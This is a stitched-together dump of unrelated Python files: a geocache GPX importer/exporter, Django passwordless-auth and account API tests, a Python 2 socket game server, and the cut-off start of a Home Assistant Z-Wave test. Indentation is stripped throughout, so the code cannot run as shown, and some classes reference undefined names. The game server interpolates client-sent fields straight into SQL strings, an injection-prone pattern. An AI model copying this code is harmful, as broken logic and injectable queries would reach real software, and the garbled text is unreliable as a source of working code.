data['latmin'] = 1000.0
data['latmax'] = -1000.0
data['lonmin'] = 1000.0
data['lonmax'] = -1000.0
root = etree.Element(GPX+"gpx", nsmap={None:GPX_NS, "xsi":XSI_NS})
root.attrib["version"] = "1.0"
root.attrib["creator"] = "geodb, all rights reserved"
root.attrib[XSI+"schemaLocation"] = "{} {}/gpx.xsd {} {}/cache.xsd".format(GPX_NS,GPX_NS,GS_NS,GS_NS)
subnode(root, GPX+"name" , text="Cache Listing Generated by andyBee")
subnode(root, GPX+"desc" , text="This is an individual list of geocaches generated by andyBee.")
subnode(root, GPX+"author" , text="Hi, it's me: Jens Guballa")
subnode(root, GPX+"email" , text="andyBee@guballa.de")
subnode(root, GPX+"url" , text="http://www.guballa.de")
subnode(root, GPX+"urlname", text="Geocaching. What else?")
subnode(root, GPX+"time" , text=datetime.datetime.now().isoformat())
subnode(root, GPX+"keyword", text="cache, geocache")
bounds = subnode(root, GPX+"bounds")
for id in data['list']:
geocache = Geocache(id, geocache_db).fetch_singular()
geocache_to_xml(root, geocache.get_data(), data)
bounds.attrib['minlat'] = str(data['latmin'])
bounds.attrib['minlon'] = str(data['lonmin'])
bounds.attrib['maxlat'] = str(data['latmax'])
bounds.attrib['maxlon'] = str(data['lonmax'])
et = etree.ElementTree(root)
return etree.tostring(et, pretty_print=True, encoding="UTF-8", xml_declaration=True)
class GpxImporter():
def __init__(self, geocache_db, max_logs, pref_owner):
self.waypoint_itf = DbInterface(geocache_db, Waypoint)
self.waypoint_sym_itf = DbInterface(geocache_db, WaypointSym)
self.waypoint_type_itf = DbInterface(geocache_db, WaypointType)
self.cache_itf = DbInterface(geocache_db, Cache)
self.cache_type_itf = DbInterface(geocache_db, CacheType)
self.cache_state_itf = DbInterface(geocache_db, CacheState)
self.cache_country_itf = DbInterface(geocache_db, CacheCountry)
self.cache_container_itf = DbInterface(geocache_db, CacheContainer)
self.cache_to_attribute_itf = DbInterface(geocache_db, CacheToAttribute)
self.cacher_itf = CacherInterface(geocache_db, Cacher)
self.log_type_itf = DbInterface(geocache_db, LogType)
self.log_itf = LogInterface(geocache_db, Log)
self.db = geocache_db
self.deleted_wpt = {}
self.max_logs = max_logs
self.pref_owner = pref_owner
self.last_updated = 0
def import_gpx(self, gpx_file):
try:
start = time.time()
tree = etree.parse(gpx_file)
end = time.time()
except:
return
gpx = tree.getroot()
if gpx.tag == GPX+"gpx":
# First, parse all the common elements
for node in gpx:
if node.tag == GPX+"time":
self.last_updated = calendar.timegm(parse(node.text).utctimetuple())
break
# Second, parse all waypoints
for node in gpx:
if node.tag == GPX+"wpt":
wpt = self._parse_wpt(node)
self._merge_wpt(wpt)
geocache_db.execute('''UPDATE waypoint
SET cache_id = (SELECT cache.id FROM cache WHERE cache.gc_code = waypoint.gc_code)
WHERE cache_id IS NULL''')
self.db.commit()
def _parse_wpt(self, node):
wpt = Waypoint()
wpt.cache = None
wpt.db['lat'] = float(node.get("lat"))
wpt.db['lon'] = float(node.get("lon"))
for child in node:
if child.tag == GPX+"time":
wpt.db['time'] = child.text
elif child.tag == GPX+"name":
wpt.db['name'] = child.text
wpt.db['gc_code'] = re.sub('^..', 'GC', child.text)
elif child.tag == GPX+"desc":
wpt.db['descr'] = child.text
elif child.tag == GPX+"url":
wpt.db['url'] = child.text
elif child.tag == GPX+"urlname":
wpt.db['urlname'] = child.text
elif child.tag == GPX+"sym":
wpt.sym = child.text
wpt.db['sym_id'] = self.waypoint_sym_itf.create_singleton_value('name', child.text)
elif child.tag == GPX+"type":
#wpt.db['type_id'] = geocache_db.create_singleton_id(WaypointType, {'name': child.text})
wpt.db['type_id'] = self.waypoint_type_itf.create_singleton_value('name', child.text)
elif child.tag == GPX+"cmt":
wpt.db['cmt'] = child.text
elif child.tag == GS+"cache":
wpt.cache = self._parse_cache(child)
wpt.db['cache_id'] = wpt.cache.db['id']
if wpt.cache is not None:
# copy some values from the waypoint, so that join statements
# can be avoided
wpt.cache.db['hidden'] = wpt.db['time']
wpt.cache.db['lat'] = wpt.db['lat']
wpt.cache.db['lon'] = wpt.db['lon']
wpt.cache.db['gc_code'] = wpt.db['name']
wpt.cache.db['url'] = wpt.db['url']
wpt.cache.db['found'] = (wpt.sym == 'Geocache Found')
return wpt
def _parse_cache(self, node):
cache = Cache()
cache.db['last_updated'] = self.last_updated
cache.db['id'] = int(node.get("id"))
cache.db['available'] = (node.get("available") == "True")
cache.db['archived'] = (node.get("archived") == "True")
for child in node:
if child.tag == GS+"name":
cache.db['name'] = child.text
elif child.tag == GS+"placed_by":
cache.db['placed_by'] = child.text
elif child.tag == GS+"owner":
owner_id = int(child.get("id"))
self.cacher_itf.create_singleton(owner_id, child.text)
cache.db['owner_id'] = owner_id
# geocache_db.create_singleton_id(Cacher, {'id': child.get("id") , 'name': child.text})
elif child.tag == GS+"type":
#cache.db['type_id'] = geocache_db.create_singleton_id(CacheType, {'name': child.text})
cache.db['type_id'] = self.cache_type_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"container":
#cache.db['container_id'] = geocache_db.create_singleton_id(CacheContainer, {'name': child.text})
cache.db['container_id'] = self.cache_container_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"difficulty":
cache.db['difficulty'] = float(child.text)
elif child.tag == GS+"terrain":
cache.db['terrain'] = float(child.text)
elif child.tag == GS+"country":
#cache.db['country_id'] = geocache_db.create_singleton_id(CacheCountry, {'name': child.text})
cache.db['country_id'] = self.cache_country_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"state":
#cache.db['state_id'] = geocache_db.create_singleton_id(CacheState, {'name': child.text})
cache.db['state_id'] = self.cache_state_itf.create_singleton_value('name', child.text)
elif child.tag == GS+"short_description":
cache.db['short_desc'] = child.text
cache.db['short_html'] = (child.get("html") == "True")
elif child.tag == GS+"long_description":
cache.db['long_desc'] = child.text
cache.db['long_html'] = (child.get("html") == "True")
elif child.tag == GS+"encoded_hints":
cache.db['encoded_hints'] = child.text
elif child.tag == GS+"attributes":
cache.attributes = []
for node_attr in child:
if node_attr.tag == GS+"attribute":
cache.attributes.append(self._parse_attribute(node_attr))
elif child.tag == GS+"logs":
cache.logs = []
for node_log in child:
if node_log.tag == GS+"log":
cache.logs.append(self._parse_log(node_log, cache.db['id']))
return cache
def _parse_attribute(self, node):
attr = Attribute()
attr.db['gc_id'] = int(node.get("id"))
attr.db['inc'] = (node.get("inc") == "1")
attr.db['name'] = node.text
return attr
def _parse_log(self, node, cache_id):
log = Log()
log.db['id'] = int(node.get("id"))
log.db['cache_id'] = cache_id
for log_node in node:
if log_node.tag == GS+"date":
log.db['date'] = log_node.text
elif log_node.tag == GS+"type":
#log.db['type_id'] = geocache_db.create_singleton_id(LogType, {'name': log_node.text})
log.db['type_id'] = self.log_type_itf.create_singleton_value('name', log_node.text)
elif log_node.tag == GS+"finder":
log.db['finder_id'] = int(log_node.get("id"))
log.finder = log_node.text
elif log_node.tag == GS+"text":
log.db['text'] = log_node.text
log.db['text_encoded'] = (log_node.get("encoded") == "True")
elif log_node.tag == GS+"log_wpt":
log.db['lat'] = float(log_node.get("lat"))
log.db['lon'] = float(log_node.get("lon"))
return log
def _merge_wpt(self, wpt):
gc_code = wpt.db['gc_code']
#cache_exists = geocache_db.get_singleton_id(Cache, {'gc_code': gc_code}) != None
cache_exists = self.cache_itf.get_id('gc_code', gc_code) != None
if cache_exists:
if gc_code == wpt.db['name']: # waypoint for the cache itself
geocache_db.execute('DELETE FROM waypoint WHERE gc_code = ? AND name = ?', (gc_code, gc_code))
else: # additional waypoint
if gc_code not in self.deleted_wpt:
geocache_db.execute('DELETE FROM waypoint WHERE gc_code = ? AND name != ?', (gc_code, gc_code))
self.deleted_wpt[gc_code] = True
self.waypoint_itf.insert(wpt.db)
if wpt.cache is not None:
self._merge_cache(wpt.cache, cache_exists)
def _merge_cache(self, cache, cache_exists):
last_logs = self._merge_logs(cache.logs, cache.db['id'])
cache.db['last_logs'] = last_logs
if cache_exists:
self.cache_itf.update(cache.db['id'], cache.db)
else:
self.cache_itf.insert(cache.db)
self._merge_attributes(cache.attributes, cache.db['id'], cache_exists)
def _merge_logs(self, logs, cache_id):
db_logs = self.log_itf.get_cache_logs(cache_id)
merged_array = []
for log in logs:
if log.db['id'] in db_logs:
del db_logs[log.db['id']]
merged_array.append({'id': log.db['id'], 'date': log.db['date'], 'finder': log.finder, 'type_id': log.db['type_id'], 'action': 'update', 'db': log.db})
else:
merged_array.append({'id': log.db['id'], 'date': log.db['date'], 'finder': log.finder, 'type_id': log.db['type_id'], 'action': 'insert', 'db': log.db})
for log in db_logs.values():
merged_array.append(log)
sorted_logs = sorted(merged_array, key=lambda log: log['date'], reverse=True)
log_cntr = 1
for log in sorted_logs:
if (log_cntr <= self.max_logs) or (log['finder'] == self.pref_owner):
if log['action'] == 'insert':
self.cacher_itf.create_singleton(log['db']['finder_id'], log['finder'])
self.log_itf.insert(log['db'])
elif log['action'] == 'update':
self.cacher_itf.create_singleton(log['db']['finder_id'], log['finder'])
self.log_itf.update(log['id'], log['db'])
else:
self.log_itf.delete('id', log['id'])
log_cntr = log_cntr + 1
last_logs = ';'.join([self.log_type_itf.get_value(log['type_id'], 'name') for log in sorted_logs[:5]])
return last_logs
def _merge_attributes(self, attributes, cache_id, cache_exists):
if cache_exists:
self.cache_to_attribute_itf.delete('cache_id', cache_id)
for attr in attributes:
id = geocache_db.create_singleton_id(Attribute, attr.db)
self.cache_to_attribute_itf.insert({'cache_id': cache_id, 'attribute_id': id})
class AttributeInterface():
def __init__(self, db, cls):
DbInterface.__init__(self, db, cls)
def get_id(self, columns):
if self._reverse_lookup_table is None:
for row in self.execute('SELECT id, gc_id, inc, name FROM attribute'):
vals = '|'.join([row['gc_id'], row['inc'], row['name']])
self._reverse_lookup_table[vals] = id
vals = '|'.join([columns['gc_id'], columns['inc'], columns['name']])
if vals in self._reverse_lookup_table:
return self._reverse_lookup_table[vals]
else:
return None
def create_singleton(self, columns):
id = self.get_id(columns)
if id is not None:
return id
self.insert(columns)
id = self.db.cursor.lastrowid
vals = '|'.join([columns['gc_id'], columns['inc'], columns['name']])
self._reverse_lookup_table[vals] = id
if self._lookup_table is not None:
self._lookup_table[id] = value
return id
class CacherInterface(DbInterface):
def __init__(self, db, cls):
DbInterface.__init__(self, db, cls)
def create_singleton(self, id, name):
db_name = self.get_value(id, 'name')
if db_name is None:
self.insert({'id': id, 'name': name})
self._lookup_table[id] = name
if self._reverse_lookup_table is not None:
self._reverse_lookup_table[name] = id
else:
if name != db_name:
self.update(id, {'name': name})
self._lookup_table[id] = name
if self._reverse_lookup_table is not None:
self._reverse_lookup_table[name] = id
class LogInterface(DbInterface):
def __init__(self, db, cls):
DbInterface.__init__(self, db, cls)
self._pool = {}
for row in self.execute('SELECT id, date, cache_id, finder_id, type_id FROM log'):
if row['cache_id'] not in self._pool:
self._pool[row['cache_id']] = {}
self._pool[row['cache_id']][row['id']] = {'id': row['id'], 'date': row['date'], 'finder_id': row['finder_id'], 'type_id': row['type_id'], 'action': 'none'}
def get_cache_logs(self, cache_id):
if cache_id in self._pool:
return self._pool[cache_id]
else:
return {}
|
|
import json
from django.contrib.auth import authenticate
from django.contrib.auth import get_user_model
from django.contrib.sessions.models import Session
from django.core import mail
from django.test import TestCase
from django.test.client import Client
from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APIClient
from rest_framework.authtoken.models import Token
from .utils import obj_is
from .api_utils import is_user_me
from ..factories import AccountFactory
from .. import settings
Account = get_user_model()
class PasswordlessAuthTest(TestCase):
ACCOUNT_PASSWORD = 'test'
def setUp(self, *args, **kwargs):
super(TestCase, self).setUp(*args, **kwargs)
self.account_1 = Account(email='test1@taggler.com')
self.account_1.set_password(self.ACCOUNT_PASSWORD)
self.account_1.save()
self.passwordless = Account(email='passwordless@taggler.com')
self.passwordless.save()
def test_email_password_auth(self):
self.assertTrue(authenticate(email=self.account_1.email, password=self.ACCOUNT_PASSWORD))
def test_email_password_fails_for_wrong_password(self):
self.assertFalse(authenticate(email=self.account_1.email, password=self.ACCOUNT_PASSWORD*2))
def test_email_password_fails_for_wrong_email(self):
self.assertFalse(authenticate(email=self.account_1.email*2, password=self.ACCOUNT_PASSWORD))
def test_email_password_fails_for_wrong_password_and_email(self):
self.assertFalse(authenticate(email=self.account_1.email*2, password=self.ACCOUNT_PASSWORD*2))
def test_email_password_fails_for_blank_email(self):
self.assertFalse(authenticate(email='', password=''))
def test_passwordless_auth(self):
self.assertTrue(authenticate(passwordless_key=self.passwordless.passwordless_key))
def test_passwordless_auth_fails_for_registered_users(self):
self.assertFalse(authenticate(passwordless_key=self.account_1.passwordless_key))
def test_is_passwordless_property(self):
self.assertTrue(self.passwordless.is_passwordless, msg="Passwordless user is not correctly detected")
self.assertFalse(self.account_1.is_passwordless, msg="User with password is incorrectly flagged as passwordless")
def test_passwordless_login_middleware(self):
c = Client()
def get_sessionid(response):
return response.cookies.get('sessionid').value
# Verify we don't have a cookie set when hitting the login page without login
response = c.get('/login')
self.assertIsNone(response.cookies.get('sessionid'))
# Verify the cookie is set after hitting the homepage with a passwordless login
response = c.get('/login', {settings.PASSWORDLESS_GET_PARAM: self.account_1.passwordless_key})
session = Session.objects.get(session_key=get_sessionid(response))
uid = session.get_decoded().get('_auth_user_id')
users = Account.objects.filter(pk=uid)
self.assertEqual(users.count(), 1)
class OneTimeAuthenticationKeyAuthTest(TestCase):
ACCOUNT_PASSWORD = 'test'
def setUp(self, *args, **kwargs):
super(TestCase, self).setUp(*args, **kwargs)
self.account_1 = Account(email='test1@taggler.com')
self.account_1.set_password(self.ACCOUNT_PASSWORD)
self.account_1.save()
def test_one_time_authentication_key_middleware(self):
c = Client()
def get_sessionid(response):
return response.cookies.get('sessionid').value
# Verify we don't have a cookie set when hitting the login page without login
response = c.get('/login')
self.assertIsNone(response.cookies.get('sessionid'))
# Save one time authentication key
one_time_authentication_key = self.account_1.one_time_authentication_key
# Verify the cookie is set after hitting the homepage with a one time authentication key
response = c.get('/login', {settings.ONE_TIME_AUTHENTICATION_KEY_GET_PARAM: one_time_authentication_key})
session = Session.objects.get(session_key=get_sessionid(response))
uid = session.get_decoded().get('_auth_user_id')
users = Account.objects.filter(pk=uid)
self.assertEqual(users.count(), 1)
# Check that one time authentication key changed upon use
self.assertNotEqual(users[0].one_time_authentication_key, one_time_authentication_key)
class SignupEmailTest(TestCase):
ACCOUNT_EMAIL = 'customer@taggler.com'
ACCOUNT_PASSWORD = 'password'
def test_signup_email_sent(self):
self.account = Account(email=self.ACCOUNT_EMAIL)
self.account.set_password(self.ACCOUNT_PASSWORD)
self.account.save()
self.assertTrue(authenticate(email=self.account.email, password=self.ACCOUNT_PASSWORD))
class ApiAuthTest(TestCase):
def setUp(self):
super(ApiAuthTest, self).setUp()
self.client = APIClient()
self.email = 'shane@clearsumm.it'
self.password = 'ultrapress'
def test_auth_login(self):
self.test_auth_signup_with_password()
response = self.client.post(reverse('account-login'), data={'email': self.email, 'password': self.password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK, msg=str(response.status_code) + ': ' + str(response.content))
content = response.content.decode("utf-8")
self.assertTrue(obj_is(content, is_user_me), msg=content)
def test_auth_login_with_wrong_password(self):
self.test_auth_signup_with_password()
response = self.client.post(reverse('account-login'), data={'email': self.email, 'password': self.password*2}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=response.status_code)
def test_auth_signup_passwordless(self):
response = self.client.post(reverse('account-signup'), data={'email': self.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK, msg=str(response.status_code) + ': ' + str(response.content))
content = response.content.decode("utf-8")
self.assertTrue(obj_is(content, is_user_me), msg=content)
account = Account.objects.get(email=self.email)
self.assertTrue(account.is_passwordless)
def test_auth_signup_email_taken(self):
self.test_auth_signup_passwordless()
response = self.client.post(reverse('account-signup'), data={'email': self.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_412_PRECONDITION_FAILED, msg=str(response.status_code) + ': ' + str(response.content))
def test_auth_signup_with_password(self):
response = self.client.post(reverse('account-signup'), data={'email': self.email, 'password': self.password}, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK, msg=str(response.status_code) + ': ' + str(response.content))
content = response.content.decode("utf-8")
self.assertTrue(obj_is(content, is_user_me), msg=content)
account = Account.objects.get(email=self.email)
self.assertFalse(account.is_passwordless)
def test_auth_logout(self):
response = self.client.delete(reverse('account-logout'), format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content))
def test_password_reset(self):
# check that non-existant email sends back an error
response = self.client.post(reverse('account-reset-password'), data={'email': self.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, msg=str(response.status_code) + ': ' + str(response.content))
self.assertEqual(len(mail.outbox), 0)
# check that existing email sends back a good response and sends an email
account = AccountFactory(email=self.email)
num_emails = len(mail.outbox)
response = self.client.post(reverse('account-reset-password'), data={'email': account.email}, format='json')
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content) + ': ' + str(account.email))
self.assertEqual(len(mail.outbox), num_emails + 1)
def test_change_email(self):
NEW_EMAIL = 'asdasfasdf@adsfasf.com'
NEW_MISMATCH_EMAIL = NEW_EMAIL + 'd'
NEW_FAIL_EMAIL = 'adsfasdfasdfasdf'
WRONG_PASSWORD = self.password + '1'
self.test_auth_signup_with_password()
account = Account.objects.all()[0]
self.assertEqual(account.email, self.email)
# check that change email works when email and confirm_email are the same
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_EMAIL, 'confirm_email': NEW_EMAIL, 'password': self.password}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when email and confirm_email are different
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_MISMATCH_EMAIL, 'confirm_email': NEW_EMAIL, 'password': self.password}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "EMAIL MISMATCH")
account = Account.objects.all()[0]
self.assertNotEqual(account.email, NEW_MISMATCH_EMAIL)
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when email is invalid
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_FAIL_EMAIL, 'confirm_email': NEW_FAIL_EMAIL, 'password': self.password}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "EMAIL INVALID")
account = Account.objects.all()[0]
self.assertNotEqual(account.email, NEW_FAIL_EMAIL)
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when password is invalid
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={'email': NEW_FAIL_EMAIL, 'confirm_email': NEW_FAIL_EMAIL, 'password': WRONG_PASSWORD}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "BAD PASSWORD")
account = Account.objects.all()[0]
self.assertNotEqual(account.email, NEW_FAIL_EMAIL)
self.assertEqual(account.email, NEW_EMAIL)
# check that change email failed when email isn't sent
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_email/', data={}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
content = json.loads(response.content.decode("utf-8"))
self.assertEqual(content['error'], "EMAIL MISSING")
account = Account.objects.all()[0]
self.assertEqual(account.email, NEW_EMAIL)
def test_change_password(self):
NEW_PASSWORD = self.password + '1'
BAD_PASSWORD_REPEAT = NEW_PASSWORD + '2'
WRONG_PASSWORD = self.password + '3'
self.test_auth_signup_with_password()
account = Account.objects.all()[0]
self.assertEqual(account.email, self.email)
# check that sending the wrong current password fails
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_password/', data={'current_password': WRONG_PASSWORD, 'password': NEW_PASSWORD, 'password_repeat': NEW_PASSWORD}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertTrue(account.check_password(self.password))
# check that sending mismatching new passwords fails
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_password/', data={'current_password': self.password, 'password': NEW_PASSWORD, 'password_repeat': BAD_PASSWORD_REPEAT}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertTrue(account.check_password(self.password))
# check that sending matching new passwords and the correct current password succeeds
header = {'HTTP_AUTHORIZATION': 'Token {}'.format(Token.objects.get(user=account).key)}
response = self.client.patch('/api/v1/accounts/change_password/', data={'current_password': self.password, 'password': NEW_PASSWORD, 'password_repeat': NEW_PASSWORD}, format='json', **header)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT, msg=str(response.status_code) + ': ' + str(response.content))
account = Account.objects.all()[0]
self.assertTrue(account.check_password(NEW_PASSWORD))
|
|
#!/usr/local/bin/python2.7
# encoding: utf-8
import socket
import sys
import os
import mmap
import json
import datetime
import math
import pymysql
import multiprocessing
import exceptions
import string
import array
import random
import threading
import traceback
import cmd
#from pyamf import remoting
shutdown = False
class TerminalNode(object):
name = ''
posx = 0
posy = 0
posz = 0
inventory = []
players = []
def run(self):
self.host = 'IP_ADDRESS'
self.port = 9997
log('Server started')
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind(('', self.port))
self.sock.listen(3)
try:
while True:
if shutdown == True:
self.sock.shutdown(1)
self.sock.close()
break
self.socket = self.sock.accept()
p = multiprocessing.Process(target=self.handle, args=(self.socket[0],self. socket[1], self.players))
p.start()
except socket.error, e:
log( 'Error accepting connection: %s' % e[1])
def handle(self, conn, addr, players):
self.db = pymysql.connect(host='MYSQL_HOST', user='MYSQL_USERNAME', passwd='MYSQL_PASSWORD', db='MYSQL_DATABASE')
addrstr = '%s:%s' % (addr[0],addr[1])
try:
log( 'Connection opened: %s' % addrstr)
#with contextlib.closing(conn):
while True:
# It's possible that we won't get the entire request in
# a single recv, but very unlikely.
data = conn.recv(2048)
if data == '':
self.db.close();
log('Connection closed: %s' % addrstr)
break
if '\n' in data:
log('break found')
dataList = data.split("%")
if len(dataList) > 2:
action = str(dataList[0])
# 0 = no encoding, 1 = json without keys, 2 = json with keys
encoding = int(dataList[1])
data = dataList[2]
log( 'recieved: '+action+' from '+str(addr)+' with data '+data )
pdata = self.decode(encoding,data)
# Virtal Player Interface
if action == 'join':
self.join(encoding, pdata, conn, addr)
if action == 'move':
self.move(encoding, pdata, conn, addr)
if action == 'look':
self.look(encoding, pdata, conn, addr)
if action == 'say':
self.say(encoding, pdata, conn, addr)
if action == 'grab':
self.grab(encoding, pdata, conn, addr)
except socket.error, e:
log( 'Error handling connection from %s: %s' % (addrstr, e))
except Exception, e:
log('Error handling connection from %s: %s' % (addrstr, e))
# method to encode and send data
def sendData(self, encoding, action, pdata, conn, addr):
message = self.encode(encoding, pdata)
tosend = action+'%'+str(encoding)+'%'+str(message)+'%;'
if len(str(message)) > 100:
log('SENDING: '+action+'%'+str(encoding)+'%LARGE DATA SET')
else:
log( tosend)
try:
conn.sendall(tosend)
except socket.error, e:
if isinstance(e.args, tuple):
log( "errno is %d" % e[0])
if e[0] == errno.EPIPE:
# remote peer disconnected
log( "Detected remote disconnect")
else:
# determine and handle different error
pass
else:
log( "socket error %s" % e)
self.sock.close()
# 0 = skip encoding, 1 = encode list and dict, 2 = reserved for future encodings
def encode(self, encoding, data):
if encoding == 0:
return data
elif encoding == 1:
return json.dumps(data, separators=(',',':'))
else:
return json.JSONEncoder(data)
# decode json to dict or list if reqired
def decode(self, encoding, data):
if encoding == 0:
return data
elif encoding == 1:
return json.loads(data)
else:
return json.JSONDecoder(data)
def join(self, encoding, pdata, conn, addr):
self.sendData(0, 'join', 'player'+str(len(self.players)), conn, addr)
def move(self, encoding, pdata, conn, addr):
pass
def look(self, encoding, pdata, conn, addr):
level = int(pdata[0])
exp = int(pdata[1])
location = int(pdata[2])
ship = int(pdata[3])
money = int(pdata[4])
username = str(pdata[5])
timesPlayed = int(pdata[6])
armor = int(pdata[7])
energy = int(pdata[8])
turrets = str(pdata[9])
modules = str(pdata[10])
plugins = str(pdata[11])
cargo = str(pdata[12])
lastPlayed = int(pdata[13])
if lastPlayed == False:
lastPlayed = 0;
uid = int(pdata[14])
cur1 = self.db.cursor()
try:
cur1.execute("DELETE FROM wts_players WHERE uid = '%d' LIMIT 1" % (uid))
except Exception, e:
log( 'unable to delete')
log( e)
cur2 = self.db.cursor()
try:
# don't save records from development adddess
if(str(addr[0]) == 'TESTING_MACHINE_IP'):
return
cur2.execute("INSERT INTO wts_players SET uid = '%d', \
address = '%s', \
times_played = '%d', \
level = '%d', \
exp = '%d', \
location = '%d', \
ship = '%d', \
money = '%d', \
username = '%s', \
armor = '%d', \
energy = '%d', \
turrets = '%s', \
modules = '%s', \
plugins = '%s', \
cargo = '%s', \
last_played = '%d'" % \
(uid, str(addr[0]), timesPlayed, level, exp, location, ship, money, username, armor, energy, turrets, modules, plugins, cargo, \
lastPlayed))
except Exception, e:
log( 'unable to save')
log(e)
def say(self, encoding, pdata, conn, addr):
uid = ''.join(random.choice(string.digits) for x in range(8))
self.sendData(0, 'genUID', int(uid), conn, addr)
def grab(self):
pass
def log(logtxt):
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
log_file = open("sock_output.txt", "a", 0)
log_file.write(str(now)+' '+ logtxt+'\n')
log_file.close()
print now, logtxt
class CLI(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
self.rows, self.columns = os.popen('stty size', 'r').read().split()
self.clr()
PS1='[\h \@]\$ '
print '\033[5'
self.prompt = '> '
self.doc_header = 'Terminal GS Help'
threading.Thread(target = self.cmdloop).start()
def clr(self):
os.system("clear")
padCount = int(self.columns)
titlePad = ' ===Terminal Game Server=== '.center(padCount)
print '\033[32;1;7m\033[40;25;4m\033[150;100'+titlePad+' \033[0m'
print '\033[2;1H\033[J' #position cursor and clear below
print '\033[31;1;237;35;25;7m COMMANDS: \033[22m', ' home stats log help quit '.center(padCount), '\033[0m'
print '\033[3;1H' #position cursor
print ''.ljust(padCount, '-')
print '\033[0m'
# print '\033[4;1H' #position cursor
#print '\033[J' #clear excess from header
def do_home(self, arg):
self.clr()
def do_stats(self, arg):
self.clr()
print len(multiprocessing.active_children()), ' connections'
def do_log(self, arg):
self.clr()
lastLog = self.tail("sock_output.txt", 16)
print "\n".join(lastLog)
def do_q(self, arg):
self.clr()
self.do_quit(arg)
def do_quit(self, arg):
self.clr()
shutdown = True
os.system("clear")
log('Server Shutdown')
sys.exit(1)
for wrkr in multiprocessing.active_children():
wrkr.join()
def default(self, arg):
self.clr()
print arg+' is not a known command. Type help to learn more.'
def help(self):
print '\n'
print 'Type help [command] to learn mree about the commands.'
def help_home(self):
self.clr()
print 'Command Help: Home'
print '=================================='
print 'Clear the screen. This is for OCD people.'
def help_stats(self):
self.clr()
print 'Command Help: Stats'
print '=================================='
print 'Show information about the terminal server environment.'
def help_log(self):
self.clr()
print 'Command Help: Log'
print '=================================='
print 'log - Show the last few entries in the log file.'
def styleText(self, style, text):
if style == 'program title':
return '\033[32;1;7m\033[40;25;4m\033[150;100'+text+' \033[0m'
def tail(self, filename, n):
"""Returns last n lines from the filename. No exception handling"""
size = os.path.getsize(filename)
with open(filename, "rb") as f:
# for Windows the mmap parameters are different
fm = mmap.mmap(f.fileno(), 0, mmap.MAP_SHARED, mmap.PROT_READ)
try:
for i in xrange(size - 1, -1, -1):
if fm[i] == '\n':
n -= 1
if n == -1:
break
return fm[i + 1 if i else 0:].splitlines()
finally:
fm.close()
def main():
try:
cli = CLI()
TerminalNode().run()
except Exception, e:
log(str(e))
sys.exit(0)
except KeyboardInterrupt:
sys.exit(0)
# shortcuts
do_q = do_quit
if __name__ == '__main__':
main()
|
|
"""Test Z-Wave config panel."""
import json
import pytest
from homeassistant.bootstrap import async_setup_component
from homeassistant.components import config
from homeassistant.components.zwave import DATA_NETWORK, const
from homeassistant.const import HTTP_NOT_FOUND
from tests.async_mock import MagicMock, patch
from tests.mock.zwave import MockEntityValues, MockNode, MockValue
VIEW_NAME = "api:config:zwave:device_config"
@pytest.fixture
def client(loop, hass, hass_client):
"""Client to communicate with Z-Wave config views."""
with patch.object(config, "SECTIONS", ["zwave"]):
loop.run_until_complete(async_setup_component(hass, "config", {}))
return loop.run_until_complete(hass_client())
async def test_get_device_config(client):
"""Test getting device config."""
def mock_read(path):
"""Mock reading data."""
